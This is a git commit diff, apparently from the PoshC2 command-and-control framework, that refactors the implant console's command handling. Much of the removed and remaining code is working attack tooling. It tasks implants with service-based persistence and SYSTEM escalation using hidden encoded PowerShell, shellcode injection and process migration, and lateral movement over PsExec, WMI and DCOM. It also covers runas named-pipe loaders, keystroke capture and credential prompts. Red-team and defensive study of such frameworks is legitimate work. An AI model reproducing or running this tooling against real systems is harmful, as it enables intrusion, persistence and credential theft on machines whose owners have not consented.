
m0rv4i 2019-03-11 20:46:55 +00:00
parent 87ad76d64c
commit a3e64f9768
6 changed files with 881 additions and 841 deletions

View File

@ -1,8 +1,10 @@
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs
from Config import HTTPResponses, POSHDIR
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob
from Config import HTTPResponses, POSHDIR, PayloadsDirectory
from Utils import randomuri
from TabComplete import readline, tabCompleter
from Help import COMMANDS
def default_response():
return (random.choice(HTTPResponses)).replace("#RANDOMDATA#",randomuri())
@ -82,3 +84,15 @@ def encrypt( key, data, gzip=False ):
if not gzip:
data = base64.b64encode( data )
return data
def filecomplete(text, state):
return (glob.glob(text+'*')+[None])[state]
def readfile_with_completion(message):
path = raw_input(message)
t = tabCompleter()
return path

View File

@ -1,23 +1,22 @@
import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess, argparse, datetime
import sys, re, os, readline, time, subprocess, traceback, signal, argparse
from sqlite3 import Error
from Help import logopic, COMMANDS, posh_help, posh_help1, posh_help2, posh_help3, posh_help4, posh_help5, posh_help6
from Help import posh_help6, posh_help7, posh_help8, pre_help, PRECOMMANDS, py_help1, sharp_help1, UXCOMMANDS, SHARPCOMMANDS
from AutoLoads import check_module_loaded, run_autoloads
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails
from DB import get_newimplanturl, get_implantbyid, new_task, get_implants, get_history_dict, get_lastcommand
from DB import new_commandhistory, get_c2urls, del_autorun, del_autoruns, add_autorun, get_autorun, get_newtasks_all
from DB import drop_newtasks, get_implanttype, update_label, update_sleep, get_history, kill_implant, unhide_implant
from DB import get_pid, get_allurls, get_sharpurls, get_randomuri, get_hostdetails, select_item
from Colours import Colours
from Config import ROOTDIR, ModulesDirectory, PayloadsDirectory, POSHDIR
from Config import ModulesDirectory, PayloadsDirectory, POSHDIR
from HTML import generate_table, graphviz
from TabComplete import tabCompleter
from Payloads import Payloads
from Alias import py_alias, ps_alias, cs_alias
from Opsec import ps_opsec
from Utils import validate_sleep_time, gen_key, randomuri
from Utils import validate_sleep_time, randomuri
from PyHandler import handle_py_command
from SharpHandler import handle_sharp_command
from PSHandler import handle_ps_command
def catch_exit(signum, frame):
@ -58,7 +57,7 @@ def process_mimikatzout(current):
if current['Username'] != '' and (current['Password'] != '' or current['NTLM'] != ''):
return current['Username'], current['Password'], current['NTLM']
def createproxypayload():
def createproxypayload(user, startup):
proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
proxypass = raw_input("Proxy Password: e.g. Password1 ")
proxyurl = raw_input("Proxy URL: .e.g. ")
@ -78,7 +77,7 @@ def createproxypayload():
new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire )
startup(user, "Created new proxy payloads")
def createdaisypayload():
def createdaisypayload(user, startup):
name = raw_input("Daisy name: e.g. DC1 ")
domain = raw_input("Domain or URL: ")
daisyurl = raw_input("Daisy host: .e.g. ")
@ -99,7 +98,7 @@ def createdaisypayload():
new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" )
startup(user, "Created new %s daisy payloads" % name)
def createnewpayload():
def createnewpayload(user, startup):
domain = raw_input("Domain or URL: ")
domainbase = (domain.lower()).replace('https://','')
domainbase = domainbase.replace('http://','')
@ -131,31 +130,6 @@ def createnewpayload():
new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire )
startup(user, "Created new payloads")
def argp(cmd):
args = ""
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-Help', '-help', '-h', action='store', dest='help', required=False)
parser.add_argument('-Source', '-source', action='store', dest='source', required=True)
parser.add_argument('-Destination', '-destination', action='store', dest='destination', required=True)
parser.add_argument('-NotHidden', '-nothidden', action='store', dest='nothidden', required=False)
args, unknown = parser.parse_known_args(shlex.split(cmd))
return args
def filecomplete(text, state):
return (glob.glob(text+'*')+[None])[state]
def readfile_with_completion(message):
path = raw_input(message)
t = tabCompleter()
return path
def complete(text, state):
for cmd in COMMANDS:
if cmd.startswith(text):
@ -164,41 +138,6 @@ def complete(text, state):
state -= 1
def load_file( location ):
fr = None
file = open((location), "rb")
fr =
except Exception as e:
print ("Error loading file %s" % e)
if fr:
return fr
return None
def migrate(randomuri, params=""):
implant = get_implantdetails(randomuri)
implant_arch = implant[10]
implant_comms = implant[15]
if implant_arch == "AMD64":
arch = "64"
arch = "86"
if implant_comms == "Normal":
shellcodefile = load_file("%s/payloads/Posh-shellcode_x%s.bin" % (ROOTDIR,arch))
elif implant_comms == "Daisy":
daisyname = raw_input("Name required: ")
shellcodefile = load_file("%s/payloads/%sPosh-shellcode_x%s.bin" % (ROOTDIR,daisyname,arch))
elif implant_comms == "Proxy":
shellcodefile = load_file("%s/payloads/ProxyPosh-shellcode_x%s.bin" % (ROOTDIR,arch))
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
def startup(user, printhelp = ""):
@ -221,7 +160,6 @@ def startup(user, printhelp = ""):
if ii:
for i in ii:
ID = i[0]
RandomURI = i[1]
LastSeen = i[7]
Hostname = i[3]
Domain = i[11]
@ -452,13 +390,13 @@ def startup(user, printhelp = ""):
if "createdaisypayload" in implant_id.lower():
createdaisypayload(user, startup)
if "createproxypayload" in implant_id.lower():
createproxypayload(user, startup)
if "createnewpayload" in implant_id.lower():
createnewpayload(user, startup)
if (implant_id == "?") or (implant_id == "help"):
startup(user, pre_help)
@ -492,775 +430,17 @@ def runcommand(command, randomuri):
except Exception as e:
ExError = e
implant_type = get_implanttype(randomuri)
if implant_type == "OSX":
# alias mapping
for alias in py_alias:
if alias[0] == command.lower()[:len(command.rstrip())]:
command = alias[1]
if 'beacon' in command.lower() or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '')
if not validate_sleep_time(new_sleep):
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
command = '$sleeptime = %s' % new_sleep
new_task(command, user, randomuri)
update_sleep(new_sleep, randomuri)
elif (command.lower().startswith('label-implant')):
label = command.replace('label-implant ', '')
update_label(label, randomuri)
elif "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(py_help1, '\n')
for line in helpfull:
if searchterm in line.lower():
print (line)
elif "unhide-implant" in command.lower():
elif "hide-implant" in command.lower():
elif command.lower() == 'sai' or command.lower() == 'sai ':
new_task('startanotherimplant', user, randomuri)
elif "upload-file" in command.lower():
source = ""
destination = ""
s = ""
if command.strip().lower() == "upload-file":
source = readfile_with_completion("Location of file to upload: ")
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = readfile_with_completion("Location of file to upload: ")
destination = raw_input("Location to upload to: ")
args = argp(command)
source = args.source
destination = args.destination
with open(source, "rb") as source_file:
s =
if s:
sourceb64 = base64.b64encode(s)
destination = destination.replace("\\","\\\\")
print ("")
print ("Uploading %s to %s" % (source, destination))
uploadcommand = "upload-file \"%s\":%s" % (destination, sourceb64)
new_task(uploadcommand, user, randomuri)
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (py_help1)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
elif 'get-screenshot' in command.lower():
taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s"
new_task(taskcmd, user, randomuri)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
pid = get_pid(randomuri)
new_task("kill -9 %s" % pid, user, randomuri)
if ri.lower() == "y":
pid = get_pid(randomuri)
new_task("kill -9 %s" % pid, user, randomuri)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
elif "linuxprivchecker" in command.lower():
params = re.compile("linuxprivchecker", re.IGNORECASE)
params = params.sub("", command)
module = open("" % ModulesDirectory, 'r').read()
encoded_module = base64.b64encode(module)
taskcmd = "linuxprivchecker -pycode %s %s" % (encoded_module, params)
new_task(taskcmd, user, randomuri)
if command:
new_task(command, user, randomuri)
handle_py_command(command, user, randomuri, startup)
elif implant_type == "C#":
check_module_loaded("Stage2-Core.exe", randomuri, user)
except Exception as e:
print ("Error loading Stage2-Core.exe: %s" % e)
# alias mapping
for alias in cs_alias:
if alias[0] == command.lower()[:len(command.rstrip())]:
command = alias[1]
if "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(sharp_help1, '\n')
for line in helpfull:
if searchterm in line.lower():
print (line)
elif "upload-file" in command.lower():
source = ""
destination = ""
s = ""
if command.strip().lower() == "upload-file":
source = readfile_with_completion("Location of file to upload: ")
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = readfile_with_completion("Location of file to upload: ")
destination = raw_input("Location to upload to: ")
args = argp(command)
source = args.source
destination = args.destination
with open(source, "rb") as source_file:
s =
if s:
sourceb64 = base64.b64encode(s)
destination = destination.replace("\\","\\\\")
print ("")
print ("Uploading %s to %s" % (source, destination))
uploadcommand = "upload-file%s;\"%s\"" % (sourceb64, destination)
new_task(uploadcommand, user, randomuri)
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
elif "unhide-implant" in command.lower():
elif "hide-implant" in command.lower():
elif "safetydump" in command.lower():
check_module_loaded("SafetyDump.exe", randomuri, user)
new_task(command, user, randomuri)
elif "inject-shellcode" in command.lower():
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
path = readfile_with_completion("Location of shellcode file: ")
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
if ri.lower() == "y":
new_task("exit",user, randomuri)
elif "seatbelt " in command.lower():
check_module_loaded("Seatbelt.exe", randomuri, user)
new_task(command, user, randomuri)
elif (command.lower().startswith("stop-keystrokes")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-keystrokes")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-screenshotmulti")):
new_task(command, user, randomuri)
elif (command.lower().startswith("get-screenshot")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("arpscan")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("testadcredential")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("testlocalcredential")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("turtle")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-userinfo")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-content")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("resolvednsname")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("resolveip")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("cred-popper")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-serviceperms")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("move")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("delete")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("ls")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower() == "pwd") or (command.lower() == "pwd "):
new_task("run-exe Core.Program Core pwd", user, randomuri)
elif (command.lower() == "ps") or (command.lower() == "ps "):
new_task("run-exe Core.Program Core Get-ProcessList", user, randomuri)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
elif "listmodules" in command.lower():
modules = os.listdir("%s/Modules/" % POSHDIR)
print ("")
print ("[+] Available modules:")
print ("")
for mod in modules:
if (".exe" in mod) or (".dll" in mod) :
print (mod)
new_task(command, user, randomuri)
elif "modulesloaded" in command.lower():
ml = get_implantdetails(randomuri)
print (ml[14])
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (sharp_help1)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '')
if not validate_sleep_time(new_sleep):
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
new_task(command, user, randomuri)
update_sleep(new_sleep, randomuri)
elif (command.lower().startswith('label-implant')):
label = command.replace('label-implant ', '')
update_label(label, randomuri)
handle_sharp_command(command, user, randomuri, startup)
if command:
new_task(command, user, randomuri)
check_module_loaded("Stage2-Core.ps1", randomuri, user)
except Exception as e:
print ("Error loading Stage2-Core.ps1: %s" % e)
run_autoloads(command, randomuri, user)
# alias mapping
for alias in ps_alias:
if alias[0] == command.lower()[:len(command.rstrip())]:
command = alias[1]
# opsec failures
for opsec in ps_opsec:
if opsec == command.lower()[:len(opsec)]:
print (Colours.RED)
print ("**OPSEC Warning**")
impid = get_implantdetails(randomuri)
ri = raw_input("Do you want to continue running - %s? (y/N) " % command)
if ri.lower() == "n":
command = ""
if ri == "":
command = ""
if ri.lower() == "y":
command = command
if ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '')
if not validate_sleep_time(new_sleep):
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
new_task(command, user, randomuri)
update_sleep(new_sleep, randomuri)
elif (command.lower().startswith('label-implant')):
label = command.replace('label-implant ', '')
update_label(label, randomuri)
elif "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(posh_help, '\n')
for line in helpfull:
if searchterm in line.lower():
print (line)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
elif "install-servicelevel-persistencewithproxy" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif "install-servicelevel-persistence" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif "remove-servicelevel-persistence" in command.lower():
new_task("sc.exe delete CPUpdater", user, randomuri)
# psexec lateral movement
elif "get-implantworkingdirectory" in command.lower():
new_task("pwd", user, randomuri)
elif "get-system-withproxy" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "get-system-withdaisy" in command.lower():
C2 = get_c2server_all()
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload =
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "get-system" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "quit" in command.lower():
ri = raw_input("Are you sure you want to quit? (Y/n) ")
if ri.lower() == "n":
if ri == "":
if ri.lower() == "y":
elif "invoke-psexecproxypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload =
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createproxypayload first")
elif "invoke-psexecdaisypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload =
params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-psexecpayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-psexecpayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
new_task(cmd, user, randomuri)
# wmi lateral movement
elif "invoke-wmiproxypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload =
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createproxypayload first")
elif "invoke-wmidaisypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload =
params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-wmipayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-wmipayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
new_task(cmd, user, randomuri)
# dcom lateral movement
elif "invoke-dcomproxypayload" in command.lower():
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload =
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
p = re.compile(r'(?<=-target.).*')
target =, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
startup(user, "Need to run createproxypayload first")
elif "invoke-dcomdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload =
p = re.compile(r'(?<=-target.).*')
target =, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-dcompayload" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
p = re.compile(r'(?<=-target.).*')
target =, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
# runas payloads
elif "invoke-runasdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload =
new_task("$proxypayload = \"%s\"" % payload, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeDaisy.ps1", randomuri, user)
params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-runasproxypayload" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload
new_task(proxyvar, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeProxy.ps1", randomuri, user)
params = re.compile("invoke-runasproxypayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
elif "invoke-runaspayload" in command.lower():
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipe.ps1", randomuri, user)
params = re.compile("invoke-runaspayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (posh_help)
elif command.lower() == "help 1":
print (posh_help1)
elif command.lower() == "help 2":
print (posh_help2)
elif command.lower() == "help 3":
print (posh_help3)
elif command.lower() == "help 4":
print (posh_help4)
elif command.lower() == "help 5":
print (posh_help5)
elif command.lower() == "help 6":
print (posh_help6)
elif command.lower() == "help 7":
print (posh_help7)
elif command.lower() == "help 8":
print (posh_help8)
elif "get-pid" in command.lower():
pid = get_implantdetails(randomuri)
print (pid[8])
elif "upload-file" in command.lower():
source = ""
destination = ""
s = ""
nothidden = False
if command.strip().lower() == "upload-file":
source = readfile_with_completion("Location of file to upload: ")
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = readfile_with_completion("Location of file to upload: ")
destination = raw_input("Location to upload to: ")
args = argp(command)
source = args.source
destination = args.destination
nothidden = args.nothidden
with open(source, "rb") as source_file:
s =
if s:
sourceb64 = base64.b64encode(s)
destination = destination.replace("\\","\\\\")
print ("")
print ("Uploading %s to %s" % (source, destination))
if (nothidden):
uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64)
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64)
new_task(uploadcommand, user, randomuri)
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
if ri.lower() == "y":
new_task("exit", user, randomuri)
elif "unhide-implant" in command.lower():
elif "hide-implant" in command.lower():
elif "migrate" in command[:7].lower():
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
migrate(randomuri, params)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
elif "invoke-daisychain" in command.lower():
check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
urls = get_allurls()
new_task("%s -URLs '%s'" % (command,urls), user, randomuri)
print ("Now use createdaisypayload")
elif "inject-shellcode" in command.lower():
#elif (command.lower() == "inject-shellcode") or (command.lower() == "inject-shellcode "):
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
path = raw_input("Location of shellcode file: ")
t = tabCompleter()
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
elif "listmodules" in command.lower():
print (os.listdir("%s/Modules/" % POSHDIR))
elif "modulesloaded" in command.lower():
ml = get_implantdetails(randomuri)
print (ml[14])
elif (command.lower() == "ps") or (command.lower() == "ps "):
